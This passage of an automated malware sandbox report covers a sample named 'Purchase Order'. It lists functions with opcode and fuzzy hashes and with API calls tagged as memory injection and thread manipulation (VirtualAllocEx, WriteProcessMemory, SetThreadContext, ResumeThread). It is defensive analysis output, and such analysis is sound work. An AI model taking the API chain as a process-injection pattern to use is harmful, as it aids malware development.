Opcode Fuzzy Hash: f98e62fcdc85997326cf491d9ecbe44053d432cbe53905aa03c9cbbade613fa9
Instruction Fuzzy Hash: D941FF70C01719CFEB25DFA9C984B8EBBB1BF89704F60806AD408AB251DB716949CF54

Uniqueness

Uniqueness Score: -1.00%

Function 069090B0 Relevance: 1.6, APIs: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069091AE

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3f4d788abd542a54fbab8745c7411efd1f987a90a6adfc2cf8bd54fbf5df2f56
Instruction ID: 474d9fb847f274ad7f47b83a97c4b3653056d11f092bc82522f6f98f2e1859b8
Opcode Fuzzy Hash: 3f4d788abd542a54fbab8745c7411efd1f987a90a6adfc2cf8bd54fbf5df2f56
Instruction Fuzzy Hash: 63416B75E002498FDB10CFA8C888ADEFBB5FF48324F24805AE565AB295C7359950CF90

Uniqueness

Uniqueness Score: -1.00%

Function 069091F9 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06909290

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: b2e6d6cf2f1de30b462751ff6aeab4ebe6e1ae15fbe551514483631bba63a640
Instruction ID: 9c421e4c9a4e9e1b5a27b4cc88b3e3b25abd1f8d080843d0454d9c2c85653f91
Opcode Fuzzy Hash: b2e6d6cf2f1de30b462751ff6aeab4ebe6e1ae15fbe551514483631bba63a640
Instruction Fuzzy Hash: B12137729103099FDB10CFA9C8857DEBBF1FF48310F14842AE959A7240D7799645CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06909200 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06909290

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ba63324fb92ef07f827124d3dc7b65c2047d03e301afa6b38417686acd4d848c
Instruction ID: a9596bb2396469ea7acd303bfbcbf2f6dfc1a25f99429ca1c38e9f07a4f3e8b1
Opcode Fuzzy Hash: ba63324fb92ef07f827124d3dc7b65c2047d03e301afa6b38417686acd4d848c
Instruction Fuzzy Hash: 7F212772900349DFDB10CFAAC885BDEBBF5FF48310F14842AE959A7241D7799944CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 069092E8 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06909370

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8958f69b76b4dc8da2f9e194d78131ce47eb9e83261af1d3eabef26852502dda
Instruction ID: 8680d9672c2828a41c635a1a3d60d6bdd13130bfcfd3acaac50f84ce20245779
Opcode Fuzzy Hash: 8958f69b76b4dc8da2f9e194d78131ce47eb9e83261af1d3eabef26852502dda
Instruction Fuzzy Hash: 8B2105B28003499FDB10CFAAD881BEEBBF5FF48310F54842AE959A7240D7799545CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 06908C2A Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06908CAE

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 372c24892d1e26ef08b0a058201ad11575b6b4e6179596c55d2bbccdf7b118c5
Instruction ID: 396dc396bee5ab0c9550d5c3d03f10e66f3b704a6954f9901f388bb59231aa26
Opcode Fuzzy Hash: 372c24892d1e26ef08b0a058201ad11575b6b4e6179596c55d2bbccdf7b118c5
Instruction Fuzzy Hash: 6B213771D003098FEB10CFAAC5857EEBBF5EF48210F54842AD459A7780C7789A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0239D288 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0239D6EE,?,?,?,?,?), ref: 0239D7AF

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: be5bb279371ed3926f4d216e802e924f8fba8abb903ce6dc0dfbd7b7e93af242
Instruction ID: 179165aad384240b6f5cc14bfafcbc420b2247175f18993e55fffc0965ad40aa
Opcode Fuzzy Hash: be5bb279371ed3926f4d216e802e924f8fba8abb903ce6dc0dfbd7b7e93af242
Instruction Fuzzy Hash: 4F21E4B590024DDFEB10CFAAD584AEEBBF8FB48310F14805AE914A3350D379A950CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0239D720 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0239D6EE,?,?,?,?,?), ref: 0239D7AF

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fa37a4153e375c70f4f78193fbc266c2824ed311964c81aca30d8dc78aca4aff
Instruction ID: 2f6994d9330c995597607ece58f6f952540216de6c4ed9e352f37b3a00f3683f
Opcode Fuzzy Hash: fa37a4153e375c70f4f78193fbc266c2824ed311964c81aca30d8dc78aca4aff
Instruction Fuzzy Hash: C421F5B5900209DFDB10CFAAD585ADEFBF4FB48310F14805AE918A7350D379A950CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 069092F0 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06909370

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d370a65fcf77c36bc6179e9818c0769facf6d0004ad74cd57e0f6a5d0ad4555d
Instruction ID: 5b9ecf0199a3924b2d83bbee2be3fb8109ca5a83573af801b0c627aae128e19f
Opcode Fuzzy Hash: d370a65fcf77c36bc6179e9818c0769facf6d0004ad74cd57e0f6a5d0ad4555d
Instruction Fuzzy Hash: AF2116718003499FDB10CFAAC881BEEBBF5FF48310F54842AE559A7240D7799540CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 06908C30 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06908CAE

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 14ce85bfd2ff2cc1ec30b9db6d669630363d4a8badc423079dcbc97212be9435
Instruction ID: 12d2a3fce4866afb6ca46127dd22e7b73a511e056a37724882b98fd2b21e006e
Opcode Fuzzy Hash: 14ce85bfd2ff2cc1ec30b9db6d669630363d4a8badc423079dcbc97212be9435
Instruction Fuzzy Hash: 39214971D003098FEB10CFAAC5857EEBBF4EF48210F14842AD559A7380D7789945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06909139 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069091AE

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d86325ec6b4d48eeb5f1cbe051f9b7d3510a5338ee50342b5a1881d0e8d6b411
Instruction ID: 8d3306df44a072697598730669939467f8624acd1234f4bc1359c035d00b38e1
Opcode Fuzzy Hash: d86325ec6b4d48eeb5f1cbe051f9b7d3510a5338ee50342b5a1881d0e8d6b411
Instruction Fuzzy Hash: 19115672D002098FEB10CFA9C8447DFBBF6EF48310F24841AE519A7250C7799641CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0239AF30 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0239B519,00000800,00000000,00000000), ref: 0239B72A

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6eceffd2bb711ae7d1cb8f57ad599b7ed5a45a30260b24aebf689fd8b4b35e72
Instruction ID: 37f269c06b0b1fb2c193266f79d4e989d43f693eae49e86b3a9b8d565d2aa568
Opcode Fuzzy Hash: 6eceffd2bb711ae7d1cb8f57ad599b7ed5a45a30260b24aebf689fd8b4b35e72
Instruction Fuzzy Hash: 8E1103B69002099FDB10CFAAD444BDEFBF5EB49214F10842ED559A7600C375A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0239B6B8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0239B519,00000800,00000000,00000000), ref: 0239B72A

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e5b1eefedfed99183c845c028735d1b7d1f82326c22210aeeed3751cc028bec9
Instruction ID: ccb6b1067409c447b4dc8fee280175a0221104c579af541ddc5bf42a8ad76233
Opcode Fuzzy Hash: e5b1eefedfed99183c845c028735d1b7d1f82326c22210aeeed3751cc028bec9
Instruction Fuzzy Hash: 521112B69002098FDB10CFAAD584BDEFBF5EF48314F10842AD859A7700C379A545CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06909140 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 069091AE

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 914ab9dc3f13ff866b3e5066f31974e0f9439231bb42c2f665e6fa14becab7b8
Instruction ID: 57b245e486b3dc7fcce897ad38fdfa639267543d1b7dfefa5c4fd02fedd6f4fe
Opcode Fuzzy Hash: 914ab9dc3f13ff866b3e5066f31974e0f9439231bb42c2f665e6fa14becab7b8
Instruction Fuzzy Hash: 411137729003499FDB10DFAAC844BDFBBF5EF48310F148419E519A7250C7759540CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06908B78 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(EC8B5506), ref: 06908BE2

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ea3c2695835f57cf22b33a13c312822f2c00523b58c4800fc84a13580e27872b
Instruction ID: 6bab010fb8c1f08744a06cfc37a863fa22655e0a53d48dd6476ddf14e4f19e04
Opcode Fuzzy Hash: ea3c2695835f57cf22b33a13c312822f2c00523b58c4800fc84a13580e27872b
Instruction Fuzzy Hash: 751146B1D006498FEB20CFAAC5457EEBBF5EF88210F24841AD519A7640C7799545CB94

Uniqueness

Uniqueness Score: -1.00%

Function 06908B80 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(EC8B5506), ref: 06908BE2

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ece6741db55623a535aa3b5023ae3fd7064e5a35ce61c37774e008c72ee77965
Instruction ID: c93abb6770ec50ea1a7aee22a5ace17d80898a54d49ffe08227fcdd760d31cc6
Opcode Fuzzy Hash: ece6741db55623a535aa3b5023ae3fd7064e5a35ce61c37774e008c72ee77965
Instruction Fuzzy Hash: 58113AB1D003498FEB10DFAAC4457EEFBF4EF48210F24842AD519A7640C7796544CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0690B718 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0690B77D

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 10a39362c4052d99de8a8516a3ee14ab318495f845b44eda01eb098937de834b
Instruction ID: a85fb4837d255c7942a8b4432efc8c86b29ad852e21627802a17ccce7682156b
Opcode Fuzzy Hash: 10a39362c4052d99de8a8516a3ee14ab318495f845b44eda01eb098937de834b
Instruction Fuzzy Hash: 151125B58003499FEB10CF9AD944BDEBBF8FB48310F10841AE858A7740C375A540CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06907118 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0690B77D

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d9779a5f20491279d54bb490ec41b0a75f18093a42ef77c9d6d99c6737219341
Instruction ID: a80a4b1b5ddfcf21047ad94db32bd4881857072a17f7ee73d7397d04919a1ad0
Opcode Fuzzy Hash: d9779a5f20491279d54bb490ec41b0a75f18093a42ef77c9d6d99c6737219341
Instruction Fuzzy Hash: 9D11F2B5800349DFEB10DF9AD984BDEBBF8EB48310F20841AE958A7640D375A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0239B438 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0239B49E

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 150701aade8d2fc36e88dc89047211782b606a835b2cb8a1bac4b4c1357cc4fc
Instruction ID: f862149ecb57936721ca11fc0801dfa4806ab7c827fbc067c940db02b9215781
Opcode Fuzzy Hash: 150701aade8d2fc36e88dc89047211782b606a835b2cb8a1bac4b4c1357cc4fc
Instruction Fuzzy Hash: 391110B5D006498FDB10CF9AD444BDEFBF5EB89328F10842AD818A7300D379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0229D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1411794812.000000000229D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0229D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_229d000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eba903ab94cd3c2bca6cc15108e2e79240efcb9ec002969a9782fa8548c4395
Instruction ID: fe5444393445c158631529ab72a3c31599ec249f4e9f40a8edfbf1127d12a8c6
Opcode Fuzzy Hash: 2eba903ab94cd3c2bca6cc15108e2e79240efcb9ec002969a9782fa8548c4395
Instruction Fuzzy Hash: 8D212875510344DFDF08EF50D9C0B26BB65FB85314F24C169D90A0B25AC376E456DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 022AD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1412058929.00000000022AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22ad000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25eeb15191587da14a5e873349d61252a01504205ae3bfc4511068373924b8c5
Instruction ID: a9abe35afb3ac2acedc14a0d6835e29a60107a7a0abfb9b681814c370129ef56
Opcode Fuzzy Hash: 25eeb15191587da14a5e873349d61252a01504205ae3bfc4511068373924b8c5
Instruction Fuzzy Hash: 71213471614340DFDB14DF60D9D0B26BBA5FB88314F24C5ADD80A4BA8AC377D807CA62

Uniqueness

Uniqueness Score: -1.00%

Function 022AD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1412058929.00000000022AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22ad000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 486305fc64a735a8a63400c071c2ae967b3706dcb73189141b566e7a6f0208cc
Instruction ID: c0781e35bc87e387aab789fad680ceeb84ff9243634fb58841efecc437900cf9
Opcode Fuzzy Hash: 486305fc64a735a8a63400c071c2ae967b3706dcb73189141b566e7a6f0208cc
Instruction Fuzzy Hash: 36213771514300DFEB00DF90C5D0B25BBA5FB84314F24C56DD80A4BA9BC3B6D806CA61

Uniqueness

Uniqueness Score: -1.00%

Function 022AD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1412058929.00000000022AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22ad000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34443faac3b9c672863aa813e9a2091ca9c4773dc066d8382f4be3dad0229a68
Instruction ID: 9cbaa34e70abaae67d365127ba4a33bf2bf97282663a04bca2c3e160a07d253a
Opcode Fuzzy Hash: 34443faac3b9c672863aa813e9a2091ca9c4773dc066d8382f4be3dad0229a68
Instruction Fuzzy Hash: 5E2184755083809FCB02CF64D994711BF71EF46314F28C5DAD8498F6A7C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0229D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1411794812.000000000229D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0229D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_229d000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction ID: 910e8eb3b9bdd96797230c900f26950d12fb1ebda41b4af0ed481644cd35289b
Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction Fuzzy Hash: 50112676404280CFCF05DF40D5C0B16BF71FB84324F24C2A9D8090B65AC33AE456DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 022AD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1412058929.00000000022AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22ad000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction ID: 18a3f7b3957cdba1ccb336aea57a76bf98f07f4b29e5859a823ecd38600710fd
Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction Fuzzy Hash: A211BB75504280DFDB01CF50C5D4B15BBA1FB84318F28C6AAD8494BAAAC37AD44ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0229D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1411794812.000000000229D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0229D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_229d000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfc5df6f3ee5a6c69240fde429b6f8b92f2833089f7dca5c54fac43a36d18cae
Instruction ID: 9e48b14b411c373e50e39fe783596687bd886e0d09a4f379b6aca8eb6ae16ab9
Opcode Fuzzy Hash: cfc5df6f3ee5a6c69240fde429b6f8b92f2833089f7dca5c54fac43a36d18cae
Instruction Fuzzy Hash: 6B01DB311143409BEB106F95CDC4BE6FBD8DF45224F14C55AED094B28AD77A9440DA76

Uniqueness

Uniqueness Score: -1.00%

Function 0229D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1411794812.000000000229D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0229D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_229d000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c968c083eba982d9aa4370bfad45b259694b28355f0ca5c33f1aec8b616cc9e9
Instruction ID: 6ceed3a3307024031bedacbb73d9510ef7e9172ae1653adbe44b03dbfd39f3bb
Opcode Fuzzy Hash: c968c083eba982d9aa4370bfad45b259694b28355f0ca5c33f1aec8b616cc9e9
Instruction Fuzzy Hash: 7CF0F631004340AFEB109F56CDC4BA2FFD8EB81234F18C05AED080B286C37A9844CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 069063E4 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 473633e1eab4fb97ead1aa362f15e72112641cdc51669dc525ed474428255008
Instruction ID: 325bc46ca8ad3657022a2610fab995449225df097bc7865d16d2fd8203e1781e
Opcode Fuzzy Hash: 473633e1eab4fb97ead1aa362f15e72112641cdc51669dc525ed474428255008
Instruction Fuzzy Hash: E5E1E674E002598FEB14DFA9C580AAEFBF2FF89305F248569D414AB756D730A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06908300 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03bf09eccfe7a3888d14f409579178b6fb4150fdba4ebf75c68ede8954cea4bc
Instruction ID: b8bb3db8b7be0734b4c6947d44e7a83e9815b4a1a4f5795067b8a2c912ab0793
Opcode Fuzzy Hash: 03bf09eccfe7a3888d14f409579178b6fb4150fdba4ebf75c68ede8954cea4bc
Instruction Fuzzy Hash: 36E1E474E102598FDB14DFA9C580AAEFBF2FF89305F24816AD414AB756D730A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 06907EC8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1a620c7defea019d5f43b99f5657dddb6f49ea4407ad05cc6ae47d65ffe1dcc
Instruction ID: 76430783d7ebdf2638d9e995327debb6b2804e3f012580b61b3bf541136d3546
Opcode Fuzzy Hash: b1a620c7defea019d5f43b99f5657dddb6f49ea4407ad05cc6ae47d65ffe1dcc
Instruction Fuzzy Hash: 3CE1F574E002598FDB54DFA8C580AAEFBF2FF89305F24856AD414AB756C730A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0239E014 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1412733742.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2390000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a655eea38f7cd7aa2a907037f1cc306219f2f851de57b5b8effd61b0105929
Instruction ID: 2efc19fe39e523c022d0596735d26bc2b5223830c2e08c79fdd7b29ebbb42028
Opcode Fuzzy Hash: 07a655eea38f7cd7aa2a907037f1cc306219f2f851de57b5b8effd61b0105929
Instruction Fuzzy Hash: 55A17C32E00219CFCF19DFB5C88059EB7B2FF86304B25456AE905AB261DB72E955CF80

Uniqueness

Uniqueness Score: -1.00%

Function 06907EB8 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dd41ab56169a0fdcb3ce34719aaef377a8b993575dfe6d4bcca8ad150afbb83
Instruction ID: 629576120da33c1c013aaf6dd28299150a0fab2f6e969da1a34e7c3228eacad8
Opcode Fuzzy Hash: 2dd41ab56169a0fdcb3ce34719aaef377a8b993575dfe6d4bcca8ad150afbb83
Instruction Fuzzy Hash: B7510874E002198FDB14CFA9C9805AEFBF2EF89314F24C16AD418AB756D731A941CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 069063E8 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1415663230.0000000006900000.00000040.00000800.00020000.00000000.sdmp, Offset: 06900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6900000_Purchase Order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd937dbe18b9d1a9842d94f511042f6d53a963ca331b2b1ac75ec70484719f4
Instruction ID: c5a37832bed49ec6c6b3c44ca289cef22186a631fda4a0658a0e96842ff2ab87
